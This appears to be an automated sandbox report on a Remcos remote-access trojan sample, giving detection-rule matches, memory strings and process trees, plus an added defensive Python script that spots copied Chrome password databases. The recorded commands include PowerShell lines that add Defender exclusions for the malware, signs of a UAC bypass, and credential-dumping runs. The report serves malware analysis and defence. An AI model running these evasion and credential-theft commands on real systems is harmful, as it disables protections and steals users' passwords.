                Source: 0.2.iGhDjzEiDU.exe.43c65b8.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                Source: 0.2.iGhDjzEiDU.exe.4309f98.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 0.2.iGhDjzEiDU.exe.4309f98.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                Source: 0.2.iGhDjzEiDU.exe.424d978.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 0.2.iGhDjzEiDU.exe.424d978.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                Source: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                Source: 00000000.00000002.1688374211.0000000004149000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 00000000.00000002.1688374211.0000000004185000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: Process Memory Space: iGhDjzEiDU.exe PID: 6984, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: Process Memory Space: iGhDjzEiDU.exe PID: 2992, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: iGhDjzEiDU.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: graias.exe.5.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: 0.2.iGhDjzEiDU.exe.9470000.7.raw.unpack, GY0wQ6K1nUpCqMVFnw.csSecurity API names: _0020.SetAccessControl
                Source: 0.2.iGhDjzEiDU.exe.9470000.7.raw.unpack, GY0wQ6K1nUpCqMVFnw.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.iGhDjzEiDU.exe.9470000.7.raw.unpack, GY0wQ6K1nUpCqMVFnw.csSecurity API names: _0020.AddAccessRule
                Source: 0.2.iGhDjzEiDU.exe.4309f98.5.raw.unpack, oirEpTQk4AEyLHDkvV.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.iGhDjzEiDU.exe.4309f98.5.raw.unpack, GY0wQ6K1nUpCqMVFnw.csSecurity API names: _0020.SetAccessControl
                Source: 0.2.iGhDjzEiDU.exe.4309f98.5.raw.unpack, GY0wQ6K1nUpCqMVFnw.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.iGhDjzEiDU.exe.4309f98.5.raw.unpack, GY0wQ6K1nUpCqMVFnw.csSecurity API names: _0020.AddAccessRule
                Source: 0.2.iGhDjzEiDU.exe.9470000.7.raw.unpack, oirEpTQk4AEyLHDkvV.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: classification engineClassification label: mal100.rans.phis.troj.spyw.expl.evad.winEXE@176/88@11/6
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeCode function: 38_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,free,38_2_004182CE
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeCode function: 5_2_00416AB7 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,5_2_00416AB7
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeCode function: 41_2_00410DE1 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueA,GetProcAddress,AdjustTokenPrivileges,CloseHandle,41_2_00410DE1
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeCode function: 38_2_00418758 GetDiskFreeSpaceW,GetDiskFreeSpaceA,free,38_2_00418758
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeCode function: 5_2_0040E219 GetModuleFileNameW,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CloseHandle,5_2_0040E219
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeCode function: 5_2_0041A64F FindResourceA,LoadResource,LockResource,SizeofResource,5_2_0041A64F
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeCode function: 5_2_00419BD4 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,5_2_00419BD4
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\iGhDjzEiDU.exe.logJump to behavior
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3752:120:WilError_03
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7196:120:WilError_03
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-O844B9
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ogwhplav.jo4.ps1Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\xyepttayrhgkznkxmawzcpzmosukc.vbs"
                Source: iGhDjzEiDU.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: iGhDjzEiDU.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeSystem information queried: HandleInformation
                Source: C:\Windows\SysWOW64\dxdiag.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: graias.exe, graias.exe, 00000026.00000002.2104616476.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: graias.exe, graias.exe, 00000027.00000002.2092543651.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: graias.exe, 00000026.00000002.2104616476.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
Source: graias.exe, graias.exe, 00000026.00000002.2104616476.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
Source: graias.exe, graias.exe, 00000026.00000002.2104616476.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: graias.exe, graias.exe, 00000026.00000002.2104616476.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: graias.exe, 00000026.00000002.2107861434.0000000002ABF000.00000004.00000020.00020000.00000000.sdmp, chpC949.tmp.38.dr | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: graias.exe, graias.exe, 00000026.00000002.2104616476.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
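The SQLite statements above come from an embedded SQLite library, and the password_notes CREATE TABLE is the schema of Chrome's Login Data database, found both in graias.exe memory and in the dropped file chpC949.tmp, which is consistent with the RAT copying the browser's credential store to a temporary name before reading it. Because such copies carry arbitrary names, triage is easier by schema than by filename. The following Python is an added example, not part of the Joe Sandbox report or of Remcos: it fingerprints an SQLite file as Chrome Login Data by checking for the logins and password_notes tables. The DDL is a constructed, reduced re-creation of that schema (the real logins table has many more columns), and the sample files it builds are constructed for the demonstration.

```python
import sqlite3
import tempfile
from pathlib import Path

# Constructed, reduced re-creation of the Chrome "Login Data" schema. The
# password_notes statement is the one recovered by the report; the logins table
# is cut down to the columns the fingerprint needs (assumption: the real table
# carries many more).
CHROME_LOGIN_DATA_DDL = """
CREATE TABLE logins (id INTEGER PRIMARY KEY AUTOINCREMENT,
    origin_url VARCHAR NOT NULL, username_value VARCHAR, password_value BLOB);
CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT,
    parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE
    DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB,
    date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
"""

# table -> columns that must all be present for a positive match
FINGERPRINT = {
    "logins": {"origin_url", "username_value", "password_value"},
    "password_notes": {"parent_id", "key", "value"},
}


def _columns(con, table):
    # PRAGMA table_info rows are (cid, name, type, notnull, dflt_value, pk);
    # table names come only from FINGERPRINT, never from input.
    return {row[1] for row in con.execute(f'PRAGMA table_info("{table}")')}


def is_chrome_login_data(path) -> bool:
    """True if the file is an SQLite database carrying Chrome's Login Data tables,
    regardless of its name or extension."""
    p = Path(path)
    if not p.is_file():
        return False
    try:
        con = sqlite3.connect(str(p))
    except sqlite3.Error:
        return False
    try:
        tables = {r[0] for r in con.execute(
            "SELECT name FROM sqlite_master WHERE type='table'")}
        return all(t in tables and cols <= _columns(con, t)
                   for t, cols in FINGERPRINT.items())
    except sqlite3.Error:   # "file is not a database", truncated, encrypted ...
        return False
    finally:
        con.close()


def scan_directory(directory):
    """Names of files directly under `directory` that fingerprint as Login Data."""
    return sorted(p.name for p in Path(directory).iterdir() if is_chrome_login_data(p))


def build_samples(directory):
    """Constructed samples: a Login Data copy under a .tmp name like the report's
    chpC949.tmp, an unrelated SQLite database and a plain text file."""
    d = Path(directory)
    con = sqlite3.connect(str(d / "chpC949.tmp"))
    con.executescript(CHROME_LOGIN_DATA_DDL)
    con.close()
    con = sqlite3.connect(str(d / "other.db"))
    con.execute("CREATE TABLE t (x INTEGER)")
    con.commit()
    con.close()
    (d / "sysinfo.txt").write_text("not a database\n")


def demo():
    """Build the samples in a scratch directory and return what the scan flags."""
    with tempfile.TemporaryDirectory() as d:
        build_samples(d)
        return scan_directory(d)


if __name__ == "__main__":
    print(demo())
```

In an investigation the directory to scan would be the user's Temp folder from the image; a production tool should open candidates read-only (SQLite's `file:...?mode=ro` URI form) so that triage never touches the evidence.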
Source: iGhDjzEiDU.exe | ReversingLabs: Detection: 71%
Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | File read: C:\Users\user\Desktop\iGhDjzEiDU.exe
Source: C:\Users\user\AppData\Roaming\Graias\graias.exe | Evasive API call chain: __getmainargs,DecisionNodes,exit
Source: unknown | Process created: C:\Users\user\Desktop\iGhDjzEiDU.exe "C:\Users\user\Desktop\iGhDjzEiDU.exe"
Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\iGhDjzEiDU.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Process created: C:\Users\user\Desktop\iGhDjzEiDU.exe "C:\Users\user\Desktop\iGhDjzEiDU.exe"
Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Process created: C:\Users\user\Desktop\iGhDjzEiDU.exe "C:\Users\user\Desktop\iGhDjzEiDU.exe"
Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Process created: C:\Users\user\AppData\Roaming\Graias\graias.exe "C:\Users\user\AppData\Roaming\Graias\graias.exe"
Source: C:\Users\user\AppData\Roaming\Graias\graias.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\Graias\graias.exe"
Source: C:\Users\user\AppData\Roaming\Graias\graias.exe | Process created: C:\Users\user\AppData\Roaming\Graias\graias.exe "C:\Users\user\AppData\Roaming\Graias\graias.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\Graias\graias.exe | Process created: C:\Windows\SysWOW64\svchost.exe svchost.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Windows\SysWOW64\svchost.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2088 --field-trial-handle=2000,i,13104816673025473941,13422850102401617178,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Windows\SysWOW64\svchost.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
Source: C:\Users\user\AppData\Roaming\Graias\graias.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2084 --field-trial-handle=2052,i,5101334319077942357,3031038982098258924,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Users\user\AppData\Roaming\Graias\graias.exe | Process created: C:\Windows\SysWOW64\svchost.exe svchost.exe
Source: C:\Windows\SysWOW64\svchost.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1748 --field-trial-handle=2016,i,6952115490064793543,9344193390170368015,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Windows\SysWOW64\svchost.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2044 --field-trial-handle=1980,i,6037255309931644860,773684642686352873,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Users\user\AppData\Roaming\Graias\graias.exe | Process created: C:\Windows\SysWOW64\svchost.exe svchost.exe
Source: C:\Windows\SysWOW64\svchost.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2028 --field-trial-handle=1988,i,6741851451867710431,3176181943120798108,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Users\user\AppData\Roaming\Graias\graias.exe | Process created: C:\Windows\SysWOW64\svchost.exe svchost.exe
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2032 --field-trial-handle=1984,i,6477219484691926715,17097649623628388741,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Windows\SysWOW64\svchost.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1908 --field-trial-handle=1956,i,397094272896585161,9213667926170046926,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Users\user\AppData\Roaming\Graias\graias.exe | Process created: C:\Windows\SysWOW64\svchost.exe svchost.exe
Source: C:\Users\user\AppData\Roaming\Graias\graias.exe | Process created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\System32\dxdiag.exe" /t C:\Users\user\AppData\Local\Temp\sysinfo.txt
Source: C:\Windows\SysWOW64\svchost.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2064 --field-trial-handle=1984,i,15953286615006375795,524760772625708092,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Users\user\AppData\Roaming\Graias\graias.exe | Process created: C:\Users\user\AppData\Roaming\Graias\graias.exe C:\Users\user\AppData\Roaming\Graias\graias.exe /stext "C:\Users\user\AppData\Local\Temp\epwvcdsubpgsncdkmqhibndmvhurqgg"
Source: C:\Users\user\AppData\Roaming\Graias\graias.exe | Process created: C:\Users\user\AppData\Roaming\Graias\graias.exe C:\Users\user\AppData\Roaming\Graias\graias.exe /stext "C:\Users\user\AppData\Local\Temp\epwvcdsubpgsncdkmqhibndmvhurqgg"
Source: C:\Users\user\AppData\Roaming\Graias\graias.exe | Process created: C:\Users\user\AppData\Roaming\Graias\graias.exe C:\Users\user\AppData\Roaming\Graias\graias.exe /stext "C:\Users\user\AppData\Local\Temp\epwvcdsubpgsncdkmqhibndmvhurqgg"
Source: C:\Users\user\AppData\Roaming\Graias\graias.exe | Process created: C:\Users\user\AppData\Roaming\Graias\graias.exe C:\Users\user\AppData\Roaming\Graias\graias.exe /stext "C:\Users\user\AppData\Local\Temp\orbocvcopxyxxqzovbukeapdendakrxtoq"
Source: C:\Users\user\AppData\Roaming\Graias\graias.exe | Process created: C:\Users\user\AppData\Roaming\Graias\graias.exe C:\Users\user\AppData\Roaming\Graias\graias.exe /stext "C:\Users\user\AppData\Local\Temp\rlggdon"
Source: C:\Users\user\AppData\Roaming\Graias\graias.exe | Process created: C:\Users\user\AppData\Roaming\Graias\graias.exe C:\Users\user\AppData\Roaming\Graias\graias.exe /stext "C:\Users\user\AppData\Local\Temp\rlggdon"
Source: C:\Windows\SysWOW64\svchost.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2128 --field-trial-handle=1896,i,8025100827868505226,8846340673771724363,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Users\user\AppData\Roaming\Graias\graias.exe | Process created: C:\Windows\SysWOW64\svchost.exe svchost.exe
Source: C:\Windows\SysWOW64\svchost.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1164 --field-trial-handle=1988,i,14003735333465884459,4249736709750483152,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Windows\SysWOW64\svchost.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
